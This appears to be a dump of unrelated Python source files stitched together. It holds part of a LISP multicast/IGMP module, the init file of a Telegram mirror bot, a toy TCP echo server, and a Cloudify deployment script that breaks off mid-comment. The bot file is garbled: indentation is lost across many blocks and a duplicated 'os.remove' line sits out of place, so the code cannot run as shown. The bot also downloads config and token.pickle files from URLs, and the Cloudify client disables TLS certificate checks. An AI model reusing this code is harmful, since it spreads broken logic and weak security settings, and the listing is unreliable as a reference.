            lisp_gleaned_groups[seid_str].pop(group_str)

    #
    # Delete the map-cache entry when the last RLE node is gone.
    #
    if (rle.rle_nodes == []):
        mc.delete_cache()
        lprint("Gleaned EID {} remove, no more RLEs".format(g))
def lisp_change_gleaned_multicast(seid, rloc, port):
    #
    # Re-glean every group this EID has joined, with the new RLOC and port.
    #
    seid_str = seid.print_address()
    if (lisp_gleaned_groups.has_key(seid_str) == False): return

    for group in lisp_gleaned_groups[seid_str]:
        lisp_geid.store_address(group)
        lisp_build_gleaned_multicast(seid, lisp_geid, rloc, port, False)
igmp_types = {17: "IGMP-query", 18: "IGMPv1-report", 19: "DVMRP",
    20: "PIMv1", 22: "IGMPv2-report", 23: "IGMPv2-leave",
    30: "mtrace-response", 31: "mtrace-request", 34: "IGMPv3-report"}

lisp_igmp_record_types = {1: "include-mode", 2: "exclude-mode",
    3: "change-to-include", 4: "change-to-exclude", 5: "allow-new-source",
    6: "block-old-sources"}
def lisp_process_igmp_packet(packet):
    source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
    source.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
    source_str = bold("from {}".format(source.print_address_no_iid()), False)

    r = bold("Receive", False)
    lprint("{} {}-byte {}, IGMP packet: {}".format(r, len(packet), source_str,
        lisp_format_packet(packet)))

    #
    # Skip the IP header; its length is in 4-byte words in the low nibble.
    #
    header_length = (struct.unpack("B", packet[0])[0] & 0x0f) * 4

    igmp = packet[header_length::]
    igmp_type = struct.unpack("B", igmp[0])[0]

    #
    # Get the group address from the fixed part of the IGMP message.
    #
    group = lisp_address(LISP_AFI_IPV4, "", 32, 0)
    group.address = socket.ntohl(struct.unpack("II", igmp[:8])[1])
    group_str = group.print_address_no_iid()

    if (igmp_type == 17):
        lprint("IGMP Query for group {}".format(group_str))
        return (True)

    report = (igmp_type in (0x12, 0x16, 0x17, 0x22))
    if (report == False):
        type_str = "{} ({})".format(igmp_type, igmp_types[igmp_type]) if \
            igmp_types.has_key(igmp_type) else igmp_type
        lprint("IGMP type {} not supported".format(type_str))
        return ([])

    if (len(igmp) < 8):
        lprint("IGMP message too small")
        return ([])

    #
    # IGMPv1/v2 joins and leaves carry a single group and no sources.
    #
    if (igmp_type == 0x17):
        lprint("IGMPv2 leave (*, {})".format(bold(group_str, False)))
        return ([[None, group_str, False]])

    if (igmp_type in (0x12, 0x16)):
        lprint("IGMPv{} join (*, {})".format(1 if (igmp_type == 0x12) else 2,
            bold(group_str, False)))

        #
        # Do not register link-local groups with the mapping system.
        #
        if (group_str.find("224.0.0.") != -1):
            lprint("Suppress registration for link-local groups")
        else:
            return ([[None, group_str, True]])

        return ([])

    #
    # IGMPv3 report: walk the group records that follow the 8-byte header.
    #
    record_count = group.address
    igmp = igmp[8::]

    record_format = "BBHI"
    record_size = struct.calcsize(record_format)
    source_format = "I"
    source_size = struct.calcsize(source_format)
    source = lisp_address(LISP_AFI_IPV4, "", 32, 0)

    groups = []
    for i in range(record_count):
        if (len(igmp) < record_size): return

        record_type, aux_data_len, source_count, address = struct.unpack(
            record_format, igmp[:record_size])

        igmp = igmp[record_size::]

        if (lisp_igmp_record_types.has_key(record_type) == False):
            lprint("Invalid record type {}".format(record_type))
            continue

        record_type_str = lisp_igmp_record_types[record_type]
        source_count = socket.ntohs(source_count)
        group.address = socket.ntohl(address)
        group_str = group.print_address_no_iid()

        lprint("Record type: {}, group: {}, source-count: {}".format(
            record_type_str, group_str, source_count))

        #
        # Types 1 and 5 are joins; types 2 and 4 with no sources are (*, G)
        # joins; anything else is treated as a leave.
        #
        joinleave = False
        if (record_type in (1, 5)): joinleave = True
        if (record_type in (2, 4) and source_count == 0): joinleave = True
        action_str = "join" if (joinleave) else "leave"

        if (group_str.find("224.0.0.") != -1):
            lprint("Suppress registration for link-local groups")
            continue

        #
        # Produce a (*, G) entry when the record carries no sources.
        #
        if (source_count == 0):
            groups.append([None, group_str, joinleave])
            lprint("IGMPv3 {} (*, {})".format(bold(action_str, False),
                bold(group_str, False)))

        #
        # Otherwise produce one (S, G) entry per source address.
        #
        for j in range(source_count):
            if (len(igmp) < source_size): return
            address = struct.unpack(source_format, igmp[:source_size])[0]
            source.address = socket.ntohl(address)
            source_str = source.print_address_no_iid()
            groups.append([source_str, group_str, joinleave])
            lprint("{} ({}, {})".format(action_str,
                green(source_str, False), bold(group_str, False)))
            igmp = igmp[source_size::]

    return (groups)
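
#
# For illustration: lisp_process_igmp_packet() returns True for queries, []
# on errors, and otherwise a list of [source, group, join?] triples; e.g. an
# IGMPv3 report joining group 239.1.1.1 yields [[None, "239.1.1.1", True]].
#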
lisp_geid = lisp_address(LISP_AFI_IPV4, "", 32, 0)

def lisp_glean_map_cache(seid, rloc, encap_port, igmp):
    #
    # Refresh an existing gleaned unicast entry if the RLOC and port are
    # unchanged; otherwise (re)build it.
    #
    rloc_change = True
    mc = lisp_map_cache.lookup_cache(seid, True)
    if (mc and len(mc.rloc_set) != 0):
        mc.last_refresh_time = lisp_get_timestamp()

        rloc_entry = mc.rloc_set[0]
        cached_rloc = rloc_entry.rloc
        cached_port = rloc_entry.translated_port
        rloc_change = (cached_rloc.is_exact_match(rloc) == False or
            cached_port != encap_port)

        if (rloc_change):
            eid_str = green(seid.print_address(), False)
            rloc_str = red(rloc.print_address_no_iid() + ":" +
                str(encap_port), False)
            lprint("Change gleaned EID {} to RLOC {}".format(eid_str,
                rloc_str))
            rloc_entry.delete_from_rloc_probe_list(mc.eid, mc.group)
            lisp_change_gleaned_multicast(seid, rloc, encap_port)
    else:
        mc = lisp_mapping("", "", [])
        mc.eid.copy_address(seid)
        mc.mapping_source.copy_address(rloc)
        mc.map_cache_ttl = LISP_GLEAN_TTL
        mc.gleaned = True
        eid_str = green(seid.print_address(), False)
        rloc_str = red(rloc.print_address_no_iid() + ":" + str(encap_port),
            False)
        lprint("Add gleaned EID {} to map-cache with RLOC {}".format(eid_str,
            rloc_str))
        mc.add_cache()

    #
    # Store the translated RLOC and encapsulation port when they changed.
    #
    if (rloc_change):
        rloc_entry = lisp_rloc()
        rloc_entry.store_translated_rloc(rloc, encap_port)
        rloc_entry.add_to_rloc_probe_list(mc.eid, mc.group)
        rloc_entry.priority = 253
        rloc_entry.mpriority = 255
        mc.rloc_set = [rloc_entry]
        mc.build_best_rloc_set()

    #
    # The rest of this function handles a piggybacked IGMP report, if any.
    #
    if (igmp == None): return

    lisp_geid.instance_id = seid.instance_id

    #
    # Glean multicast state for each allowed (*, G) join or leave the
    # report carries; (S, G) entries are skipped here.
    #
    groups = lisp_process_igmp_packet(igmp)
    if (type(groups) == bool): return

    for source, group, joinleave in groups:
        if (source != None): continue

        lisp_geid.store_address(group)
        allow, rloc_probe, igmp_query = lisp_allow_gleaning(seid, lisp_geid,
            rloc)
        if (allow == False): continue

        if (joinleave):
            lisp_build_gleaned_multicast(seid, lisp_geid, rloc, encap_port,
                True)
        else:
            lisp_remove_gleaned_multicast(seid, lisp_geid)
def lisp_is_json_telemetry(json_string):
    #
    # Return the parsed dict only when the JSON is a telemetry/timestamps
    # record; otherwise return None.
    #
    try:
        json_data = json.loads(json_string)
        if (type(json_data) != dict): return (None)
    except:
        lprint("Could not decode telemetry json: {}".format(json_string))
        return (None)

    if (json_data.has_key("type") == False): return (None)
    if (json_data.has_key("sub-type") == False): return (None)
    if (json_data["type"] != "telemetry"): return (None)
    if (json_data["sub-type"] != "timestamps"): return (None)
    return (json_data)
def lisp_encode_telemetry(json_string, ii="?", io="?", ei="?", eo="?"):
    #
    # Fill in any of the four ITR/ETR in/out timestamps that are still "?".
    #
    json_data = lisp_is_json_telemetry(json_string)
    if (json_data == None): return (json_string)

    if (json_data["itr-in"] == "?"): json_data["itr-in"] = ii
    if (json_data["itr-out"] == "?"): json_data["itr-out"] = io
    if (json_data["etr-in"] == "?"): json_data["etr-in"] = ei
    if (json_data["etr-out"] == "?"): json_data["etr-out"] = eo
    json_string = json.dumps(json_data)
    return (json_string)
def lisp_decode_telemetry(json_string):
    #
    # Return the telemetry dict, or an empty dict for non-telemetry JSON.
    #
    json_data = lisp_is_json_telemetry(json_string)
    if (json_data == None): return ({})
    return (json_data)
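
#
# For illustration, a hypothetical telemetry record the three helpers above
# would accept; the four timestamp fields start out as "?" and are filled in
# hop by hop via lisp_encode_telemetry():
#
#   {"type": "telemetry", "sub-type": "timestamps",
#    "itr-in": "?", "itr-out": "?", "etr-in": "?", "etr-out": "?"}
#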
def lisp_telemetry_configured():
    #
    # Return the configured telemetry JSON string, or None when absent or
    # malformed.
    #
    if (lisp_json_list.has_key("telemetry") == False): return (None)

    json_string = lisp_json_list["telemetry"].json_string
    if (lisp_is_json_telemetry(json_string) == None): return (None)

    return (json_string)
|
__init__.py
|
import faulthandler
import logging
import os
import random
import socket
import string
import threading
import time
import requests
import aria2p
import telegram.ext as tg
from dotenv import load_dotenv
from pyrogram import Client
import psycopg2
from psycopg2 import Error
faulthandler.enable()
import subprocess
from megasdkrestclient import MegaSdkRestClient
from megasdkrestclient import errors as mega_err
socket.setdefaulttimeout(600)
botStartTime = time.time()
if os.path.exists("log.txt"):
with open("log.txt", "r+") as f:
f.truncate(0)
logging.basicConfig(
format="%(asctime)s - %(name)s - %(levelname)s - %(message)s",
handlers=[logging.FileHandler("log.txt"), logging.StreamHandler()],
level=logging.INFO,
)
#Config And Heroku Support
CONFIG_FILE_URL = os.environ.get('CONFIG_FILE_URL')
if CONFIG_FILE_URL is not None and len(CONFIG_FILE_URL) == 0:
    CONFIG_FILE_URL = None
if CONFIG_FILE_URL is not None:
    logging.info("Downloading config.env From Provided URL")
    if os.path.isfile("config.env"):
        logging.info("Updating config.env")
        os.remove("config.env")
os.remove("config.env")
    res = requests.get(CONFIG_FILE_URL)
    if res.status_code == 200:
        with open('config.env', 'wb+') as f:
            f.write(res.content)
    else:
        logging.error(f"Failed to download config.env {res.status_code}")
load_dotenv("config.env")
Interval = []
def mktable():
try:
conn = psycopg2.connect(DB_URI)
cur = conn.cursor()
sql = "CREATE TABLE users (uid bigint, sudo boolean DEFAULT FALSE);"
cur.execute(sql)
conn.commit()
logging.info("Table Created!")
except Error as e:
logging.error(e)
exit(1)
def getConfig(name: str):
return os.environ[name]
LOGGER = logging.getLogger(__name__)
try:
if bool(getConfig("_____REMOVE_THIS_LINE_____")):
logging.error("The README.md file there to be read! Exiting now!")
exit()
except KeyError:
pass
#RECURSIVE SEARCH
DRIVE_NAME = []
DRIVE_ID = []
UNI_INDEX_URL = []
if os.path.exists('drive_folder'):
with open('drive_folder', 'r+') as f:
lines = f.readlines()
for line in lines:
temp = line.strip().split()
DRIVE_NAME.append(temp[0].replace("_", " "))
DRIVE_ID.append(temp[1])
try:
UNI_INDEX_URL.append(temp[2])
            except IndexError:
                UNI_INDEX_URL.append(None)
try:
    RECURSIVE_SEARCH = getConfig("RECURSIVE_SEARCH").lower() == "true"
except KeyError:
    RECURSIVE_SEARCH = False
if RECURSIVE_SEARCH and not DRIVE_ID:
    LOGGER.error("Fill Drive_Folder File For Multi Drive Search!")
    exit(1)
aria2 = aria2p.API(
aria2p.Client(
host="http://localhost",
port=6800,
secret="",
)
)
def aria2c_init():
try:
if not os.path.isfile(".restartmsg"):
logging.info("Initializing Aria2c")
link = "https://releases.ubuntu.com/21.10/ubuntu-21.10-desktop-amd64.iso.torrent"
path = "/usr/src/app/"
aria2.add_uris([link], {'dir': path})
time.sleep(3)
downloads = aria2.get_downloads()
time.sleep(30)
for download in downloads:
aria2.remove([download], force=True, files=True)
    except Exception as e:
        logging.error(f"Aria2c initializing error: {e}")
threading.Thread(target=aria2c_init).start()
time.sleep(0.5)
DOWNLOAD_DIR = None
BOT_TOKEN = None
download_dict_lock = threading.Lock()
status_reply_dict_lock = threading.Lock()
# Key: update.effective_chat.id
# Value: telegram.Message
status_reply_dict = {}
# Key: update.message.message_id
# Value: An object of Status
download_dict = {}
AS_DOC_USERS = set()
AS_MEDIA_USERS = set()
# Stores list of users and chats the bot is authorized to use in
AUTHORIZED_CHATS = set()
SUDO_USERS = set()
LOGS_CHATS = set()
if os.path.exists('sudo_users.txt'):
with open('sudo_users.txt', 'r+') as f:
lines = f.readlines()
for line in lines:
SUDO_USERS.add(int(line.split()[0]))
try:
schats = getConfig('SUDO_USERS')
schats = schats.split(" ")
for chats in schats:
SUDO_USERS.add(int(chats))
except:
pass
if os.path.exists("authorized_chats.txt"):
with open("authorized_chats.txt", "r+") as f:
lines = f.readlines()
for line in lines:
# LOGGER.info(line.split())
AUTHORIZED_CHATS.add(int(line.split()[0]))
try:
achats = getConfig("AUTHORIZED_CHATS")
achats = achats.split(" ")
for chats in achats:
AUTHORIZED_CHATS.add(int(chats))
except:
pass
if os.path.exists("logs_chat.txt"):
with open("logs_chat.txt", "r+") as f:
lines = f.readlines()
for line in lines:
# LOGGER.info(line.split())
LOGS_CHATS.add(int(line.split()[0]))
try:
achats = getConfig("LOGS_CHATS")
achats = achats.split(" ")
for chats in achats:
LOGS_CHATS.add(int(chats))
except:
logging.warning('Logs Chat Details not provided!')
pass
try:
PHPSESSID = getConfig('PHPSESSID')
CRYPT = getConfig('CRYPT')
if len(PHPSESSID) == 0 or len(CRYPT) == 0:
raise KeyError
except KeyError:
PHPSESSID = None
CRYPT = None
try:
BOT_TOKEN = getConfig("BOT_TOKEN")
parent_id = getConfig("GDRIVE_FOLDER_ID")
DOWNLOAD_DIR = getConfig("DOWNLOAD_DIR")
if not DOWNLOAD_DIR.endswith("/"):
DOWNLOAD_DIR = DOWNLOAD_DIR + "/"
DOWNLOAD_STATUS_UPDATE_INTERVAL = int(getConfig("DOWNLOAD_STATUS_UPDATE_INTERVAL"))
OWNER_ID = int(getConfig("OWNER_ID"))
AUTO_DELETE_MESSAGE_DURATION = int(getConfig("AUTO_DELETE_MESSAGE_DURATION"))
TELEGRAM_API = getConfig("TELEGRAM_API")
TELEGRAM_HASH = getConfig("TELEGRAM_HASH")
except KeyError:
LOGGER.error("One or more env variables missing! Exiting now")
exit(1)
try:
DB_URI = getConfig('DATABASE_URL')
if len(DB_URI) == 0:
raise KeyError
except KeyError:
DB_URI = None
if DB_URI is not None:
    conn = None
    cur = None
    try:
        conn = psycopg2.connect(DB_URI)
        cur = conn.cursor()
        sql = "SELECT * from users;"
        cur.execute(sql)
        rows = cur.fetchall()  # returns a list of (uid, sudo) tuples
        for row in rows:
            AUTHORIZED_CHATS.add(row[0])
            if row[1]:
                SUDO_USERS.add(row[0])
    except Error as e:
        if 'relation "users" does not exist' in str(e):
            mktable()
        else:
            LOGGER.error(e)
            exit(1)
    finally:
        # close only what was actually opened; connect() itself may have failed
        if cur is not None:
            cur.close()
        if conn is not None:
            conn.close()
LOGGER.info("Generating USER_SESSION_STRING")
app = Client(
":memory:", api_id=int(TELEGRAM_API), api_hash=TELEGRAM_HASH, bot_token=BOT_TOKEN
)
try:
    MEGA_KEY = getConfig("MEGA_KEY")
except KeyError:
    MEGA_KEY = None
    LOGGER.info("MEGA API KEY NOT AVAILABLE")
if MEGA_KEY is not None:
    # mega_client was never created in the original snippet; the line below
    # assumes a megasdkrest server is already running locally on its default
    # port (6090) -- adjust the URL if your setup differs.
    mega_client = MegaSdkRestClient('http://localhost:6090')
    try:
        MEGA_USERNAME = getConfig("MEGA_USERNAME")
        MEGA_PASSWORD = getConfig("MEGA_PASSWORD")
        if len(MEGA_USERNAME) > 0 and len(MEGA_PASSWORD) > 0:
            try:
                mega_client.login(MEGA_USERNAME, MEGA_PASSWORD)
            except mega_err.MegaSdkRestClientException as e:
                logging.error(e.message["message"])
                exit(0)
        else:
            LOGGER.info(
                "Mega API KEY provided but credentials not provided. Starting mega in anonymous mode!"
            )
            MEGA_USERNAME = None
            MEGA_PASSWORD = None
    except KeyError:
        LOGGER.info(
            "Mega API KEY provided but credentials not provided. Starting mega in anonymous mode!"
        )
        MEGA_USERNAME = None
        MEGA_PASSWORD = None
else:
    MEGA_USERNAME = None
    MEGA_PASSWORD = None
try:
INDEX_URL = getConfig("INDEX_URL")
if len(INDEX_URL) == 0:
INDEX_URL = None
except KeyError:
INDEX_URL = None
try:
BUTTON_THREE_NAME = getConfig("BUTTON_THREE_NAME")
BUTTON_THREE_URL = getConfig("BUTTON_THREE_URL")
if len(BUTTON_THREE_NAME) == 0 or len(BUTTON_THREE_URL) == 0:
raise KeyError
except KeyError:
BUTTON_THREE_NAME = None
BUTTON_THREE_URL = None
try:
BUTTON_FOUR_NAME = getConfig("BUTTON_FOUR_NAME")
BUTTON_FOUR_URL = getConfig("BUTTON_FOUR_URL")
if len(BUTTON_FOUR_NAME) == 0 or len(BUTTON_FOUR_URL) == 0:
raise KeyError
except KeyError:
BUTTON_FOUR_NAME = None
BUTTON_FOUR_URL = None
try:
BUTTON_FIVE_NAME = getConfig("BUTTON_FIVE_NAME")
BUTTON_FIVE_URL = getConfig("BUTTON_FIVE_URL")
if len(BUTTON_FIVE_NAME) == 0 or len(BUTTON_FIVE_URL) == 0:
raise KeyError
except KeyError:
BUTTON_FIVE_NAME = None
BUTTON_FIVE_URL = None
try:
IS_TEAM_DRIVE = getConfig("IS_TEAM_DRIVE")
IS_TEAM_DRIVE = IS_TEAM_DRIVE.lower() == "true"
except KeyError:
IS_TEAM_DRIVE = False
try:
    USE_SERVICE_ACCOUNTS = getConfig("USE_SERVICE_ACCOUNTS").lower() == "true"
except KeyError:
    USE_SERVICE_ACCOUNTS = False
try:
BLOCK_MEGA_LINKS = getConfig("BLOCK_MEGA_LINKS")
BLOCK_MEGA_LINKS = BLOCK_MEGA_LINKS.lower() == "true"
except KeyError:
BLOCK_MEGA_LINKS = False
try:
SHORTENER = getConfig("SHORTENER")
SHORTENER_API = getConfig("SHORTENER_API")
if len(SHORTENER) == 0 or len(SHORTENER_API) == 0:
raise KeyError
except KeyError:
SHORTENER = None
SHORTENER_API = None
IGNORE_PENDING_REQUESTS = False
try:
if getConfig("IGNORE_PENDING_REQUESTS").lower() == "true":
IGNORE_PENDING_REQUESTS = True
except KeyError:
pass
try:
TG_SPLIT_SIZE = getConfig('TG_SPLIT_SIZE')
if len(TG_SPLIT_SIZE) == 0 or int(TG_SPLIT_SIZE) > 2097152000:
raise KeyError
else:
TG_SPLIT_SIZE = int(TG_SPLIT_SIZE)
except KeyError:
TG_SPLIT_SIZE = 2097152000
try:
AS_DOCUMENT = getConfig('AS_DOCUMENT')
AS_DOCUMENT = AS_DOCUMENT.lower() == 'true'
except KeyError:
AS_DOCUMENT = False
#VIEW_LINK
try:
    VIEW_LINK = getConfig('VIEW_LINK').lower() == 'true'
except KeyError:
    VIEW_LINK = False
#CLONE
try:
CLONE_LIMIT = getConfig('CLONE_LIMIT')
if len(CLONE_LIMIT) == 0:
CLONE_LIMIT = None
except KeyError:
CLONE_LIMIT = None
try:
    STOP_DUPLICATE_CLONE = getConfig('STOP_DUPLICATE_CLONE').lower() == 'true'
except KeyError:
    STOP_DUPLICATE_CLONE = False
#HEROKUSUPPORT
try:
    TOKEN_PICKLE_URL = getConfig('TOKEN_PICKLE_URL')
    if len(TOKEN_PICKLE_URL) == 0:
        TOKEN_PICKLE_URL = None
    else:
        res = requests.get(TOKEN_PICKLE_URL)
        if res.status_code == 200:
            with open('token.pickle', 'wb+') as f:
                f.write(res.content)
        else:
            logging.error(f"Failed to download token.pickle {res.status_code}")
            raise KeyError
except KeyError:
    pass
try:
    ACCOUNTS_ZIP_URL = getConfig('ACCOUNTS_ZIP_URL')
    if len(ACCOUNTS_ZIP_URL) == 0:
        ACCOUNTS_ZIP_URL = None
    else:
        res = requests.get(ACCOUNTS_ZIP_URL)
        if res.status_code == 200:
            with open('accounts.zip', 'wb+') as f:
                f.write(res.content)
        else:
            logging.error(f"Failed to download accounts.zip {res.status_code}")
            raise KeyError
        subprocess.run(["unzip", "-q", "-o", "accounts.zip"])
        os.remove("accounts.zip")
except KeyError:
    pass
#uptobox
try:
UPTOBOX_TOKEN = getConfig('UPTOBOX_TOKEN')
if len(UPTOBOX_TOKEN) == 0:
raise KeyError
except KeyError:
UPTOBOX_TOKEN = None
updater = tg.Updater(token=BOT_TOKEN)
bot = updater.bot
dispatcher = updater.dispatcher
|
server-practice.py
|
# -*- coding: utf-8 -*-
import socket, threading, time
#TCP socket based on ipv4
#server
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#listening on port
s.bind(('127.0.0.1', 9999))
s.listen(5)
print("Waiting for connection...")
def tcplink(sock, addr):
print('Accept new connection from %s:%s...' % addr)
sock.send(b'Welcome!')
while True:
data = sock.recv(1024)
time.sleep(1)
if not data or data.decode('utf-8') == 'exit':
break
sock.send(('Hello, %s!' %data.decode('utf-8')).encode('utf-8'))
sock.close()
print('Connection from %s:%s closed.' % addr)
while True:
#receive a new connect
sock, addr = s.accept()
#make a new thread dispose TCPlink
t = threading.Thread(target=tcplink, args=(sock, addr))
t.start()
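# A matching client sketch (illustrative, not part of the original file);
# run it in a second process while the server above is listening:
#
#   import socket
#   c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#   c.connect(('127.0.0.1', 9999))
#   print(c.recv(1024).decode('utf-8'))   # 'Welcome!'
#   c.send(b'world')
#   print(c.recv(1024).decode('utf-8'))   # 'Hello, world!'
#   c.send(b'exit')                       # tells tcplink() to close the socket
#   c.close()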
|
_a4c_pre_configure_source.py
|
from cloudify import ctx
from cloudify.exceptions import NonRecoverableError
from cloudify.state import ctx_parameters as inputs
import subprocess
import os
import re
import sys
import time
import threading
import platform
from StringIO import StringIO
from cloudify_rest_client import CloudifyClient
from cloudify import utils
if 'MANAGER_REST_PROTOCOL' in os.environ and os.environ['MANAGER_REST_PROTOCOL'] == "https":
client = CloudifyClient(host=utils.get_manager_ip(), port=utils.get_manager_rest_service_port(), protocol='https', trust_all=True)
else:
client = CloudifyClient(host=utils.get_manager_ip(), port=utils.get_manager_rest_service_port())
def convert_env_value_to_string(envDict):
    # items() returns a list in Python 2, so mutating the dict inside the
    # loop is safe here
    for key, value in envDict.items():
        envDict.pop(key)
        envDict[str(key)] = str(value)
def get_attribute_user(ctx):
if get_attribute(ctx, 'user'):
return get_attribute(ctx, 'user')
else:
return get_attribute(ctx, 'cloudify_agent')['user']
def get_attribute_key(ctx):
if get_attribute(ctx, 'key'):
return get_attribute(ctx, 'key')
else:
return get_attribute(ctx, 'cloudify_agent')['key']
def get_host(entity):
if entity.instance.relationships:
for relationship in entity.instance.relationships:
if 'cloudify.relationships.contained_in' in relationship.type_hierarchy:
return relationship.target
return None
def has_attribute_mapping(entity, attribute_name):
ctx.logger.info('Check if it exists mapping for attribute {0} in {1}'.format(attribute_name, entity.node.properties))
mapping_configuration = entity.node.properties.get('_a4c_att_' + attribute_name, None)
if mapping_configuration is not None:
if mapping_configuration['parameters'][0] == 'SELF' and mapping_configuration['parameters'][1] == attribute_name:
return False
else:
return True
return False
def process_attribute_mapping(entity, attribute_name, data_retriever_function):
# This is where attribute mapping is defined in the cloudify type
mapping_configuration = entity.node.properties['_a4c_att_' + attribute_name]
ctx.logger.info('Mapping configuration found for attribute {0} is {1}'.format(attribute_name, mapping_configuration))
# If the mapping configuration exist and if it concerns SELF then just get attribute of the mapped attribute name
# Else if it concerns TARGET then follow the relationship and retrieved the mapped attribute name from the TARGET
if mapping_configuration['parameters'][0] == 'SELF':
return data_retriever_function(entity, mapping_configuration['parameters'][1])
elif mapping_configuration['parameters'][0] == 'TARGET' and entity.instance.relationships:
for relationship in entity.instance.relationships:
if mapping_configuration['parameters'][1] in relationship.type_hierarchy:
return data_retriever_function(relationship.target, mapping_configuration['parameters'][2])
return ""
def get_nested_attribute(entity, attribute_names):
deep_properties = get_attribute(entity, attribute_names[0])
attribute_names_iter = iter(attribute_names)
next(attribute_names_iter)
for attribute_name in attribute_names_iter:
if deep_properties is None:
return ""
else:
deep_properties = deep_properties.get(attribute_name, None)
return deep_properties
def _all_instances_get_nested_attribute(entity, attribute_names):
return None
def get_attribute(entity, attribute_name):
if has_attribute_mapping(entity, attribute_name):
# First check if any mapping exist for attribute
mapped_value = process_attribute_mapping(entity, attribute_name, get_attribute)
ctx.logger.info('Mapping exists for attribute {0} with value {1}'.format(attribute_name, mapped_value))
return mapped_value
# No mapping exist, try to get directly the attribute from the entity
attribute_value = entity.instance.runtime_properties.get(attribute_name, None)
if attribute_value is not None:
ctx.logger.info('Found the attribute {0} with value {1} on the node {2}'.format(attribute_name, attribute_value, entity.node.id))
return attribute_value
# Attribute retrieval fails, fall back to property
property_value = entity.node.properties.get(attribute_name, None)
if property_value is not None:
return property_value
# Property retrieval fails, fall back to host instance
host = get_host(entity)
if host is not None:
ctx.logger.info('Attribute not found {0} go up to the parent node {1}'.format(attribute_name, host.node.id))
return get_attribute(host, attribute_name)
# Nothing is found
return ""
def _all_instances_get_attribute(entity, attribute_name):
result_map = {}
# get all instances data using cfy rest client
# we have to get the node using the rest client with node_instance.node_id
# then we will have the relationships
node = client.nodes.get(ctx.deployment.id, entity.node.id)
all_node_instances = client.node_instances.list(ctx.deployment.id, entity.node.id)
for node_instance in all_node_instances:
prop_value = __recursively_get_instance_data(node, node_instance, attribute_name)
if prop_value is not None:
ctx.logger.info('Found the property/attribute {0} with value {1} on the node {2} instance {3}'.format(attribute_name, prop_value, entity.node.id,
node_instance.id))
result_map[node_instance.id + '_'] = prop_value
return result_map
def get_property(entity, property_name):
# Try to get the property value on the node
property_value = entity.node.properties.get(property_name, None)
if property_value is not None:
ctx.logger.info('Found the property {0} with value {1} on the node {2}'.format(property_name, property_value, entity.node.id))
return property_value
# No property found on the node, fall back to the host
host = get_host(entity)
if host is not None:
ctx.logger.info('Property not found {0} go up to the parent node {1}'.format(property_name, host.node.id))
return get_property(host, property_name)
return ""
def get_instance_list(node_id):
result = ''
all_node_instances = client.node_instances.list(ctx.deployment.id, node_id)
for node_instance in all_node_instances:
if len(result) > 0:
result += ','
result += node_instance.id
return result
def get_host_node_name(instance):
for relationship in instance.relationships:
if 'cloudify.relationships.contained_in' in relationship.type_hierarchy:
return relationship.target.node.id
return None
def __get_relationship(node, target_name, relationship_type):
for relationship in node.relationships:
if relationship.get('target_id') == target_name and relationship_type in relationship.get('type_hierarchy'):
return relationship
return None
def __has_attribute_mapping(node, attribute_name):
ctx.logger.info('Check if it exists mapping for attribute {0} in {1}'.format(attribute_name, node.properties))
mapping_configuration = node.properties.get('_a4c_att_' + attribute_name, None)
if mapping_configuration is not None:
if mapping_configuration['parameters'][0] == 'SELF' and mapping_configuration['parameters'][1] == attribute_name:
return False
else:
return True
return False
def __process_attribute_mapping(node, node_instance, attribute_name, data_retriever_function):
# This is where attribute mapping is defined in the cloudify type
mapping_configuration = node.properties['_a4c_att_' + attribute_name]
ctx.logger.info('Mapping configuration found for attribute {0} is {1}'.format(attribute_name, mapping_configuration))
# If the mapping configuration exist and if it concerns SELF then just get attribute of the mapped attribute name
# Else if it concerns TARGET then follow the relationship and retrieved the mapped attribute name from the TARGET
if mapping_configuration['parameters'][0] == 'SELF':
return data_retriever_function(node, node_instance, mapping_configuration['parameters'][1])
elif mapping_configuration['parameters'][0] == 'TARGET' and node_instance.relationships:
for rel in node_instance.relationships:
relationship = __get_relationship(node, rel.get('target_name'), rel.get('type'))
if mapping_configuration['parameters'][1] in relationship.get('type_hierarchy'):
target_instance = client.node_instances.get(rel.get('target_id'))
target_node = client.nodes.get(ctx.deployment.id, target_instance.node_id)
return data_retriever_function(target_node, target_instance, mapping_configuration['parameters'][2])
return None
def __recursively_get_instance_data(node, node_instance, attribute_name):
if __has_attribute_mapping(node, attribute_name):
return __process_attribute_mapping(node, node_instance, attribute_name, __recursively_get_instance_data)
attribute_value = node_instance.runtime_properties.get(attribute_name, None)
if attribute_value is not None:
return attribute_value
elif node_instance.relationships:
for rel in node_instance.relationships:
# on rel we have target_name, target_id (instanceId), type
relationship = __get_relationship(node, rel.get('target_name'), rel.get('type'))
if 'cloudify.relationships.contained_in' in relationship.get('type_hierarchy'):
parent_instance = client.node_instances.get(rel.get('target_id'))
parent_node = client.nodes.get(ctx.deployment.id, parent_instance.node_id)
return __recursively_get_instance_data(parent_node, parent_instance, attribute_name)
return None
else:
return None
env_map = {}
env_map['TARGET_NODE'] = ctx.target.node.id
env_map['TARGET_INSTANCE'] = ctx.target.instance.id
env_map['TARGET_INSTANCES'] = get_instance_list(ctx.target.node.id)
env_map['SOURCE_NODE'] = ctx.source.node.id
env_map['SOURCE_INSTANCE'] = ctx.source.instance.id
env_map['SOURCE_INSTANCES'] = get_instance_list(ctx.source.node.id)
env_map['A4C_EXECUTION_HOST'] = get_attribute(ctx.source, 'ip_address')
env_map['A4C_EXECUTION_USER'] = get_attribute_user(ctx.source)
env_map['A4C_EXECUTION_KEY'] = get_attribute_key(ctx.source)
env_map['PARTITION_TYPE'] = r'83'
env_map['VOLUME_ID'] = ''
env_map['DEVICE'] = get_attribute(ctx.target, 'device')
other_instances_map = _all_instances_get_attribute(ctx.target, 'device')
if other_instances_map is not None:
for other_instances_key in other_instances_map:
env_map[other_instances_key + 'DEVICE'] = other_instances_map[other_instances_key]
if inputs.get('process', None) is not None and inputs['process'].get('env', None) is not None:
ctx.logger.info('Operation is executed with environment variable {0}'.format(inputs['process']['env']))
env_map.update(inputs['process']['env'])
def parse_output(output):
# by convention, the last output is the result of the operation
last_output = None
outputs = {}
    pattern = re.compile(r'EXPECTED_OUTPUT_(\w+)=(.*)')
for line in output.splitlines():
match = pattern.match(line)
if match is None:
last_output = line
else:
output_name = match.group(1)
output_value = match.group(2)
outputs[output_name] = output_value
return {'last_output': last_output, 'outputs': outputs}
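# For illustration: a wrapped script that prints a line such as
# "EXPECTED_OUTPUT_PARTITION_NAME=/dev/vdb1" makes parse_output() return
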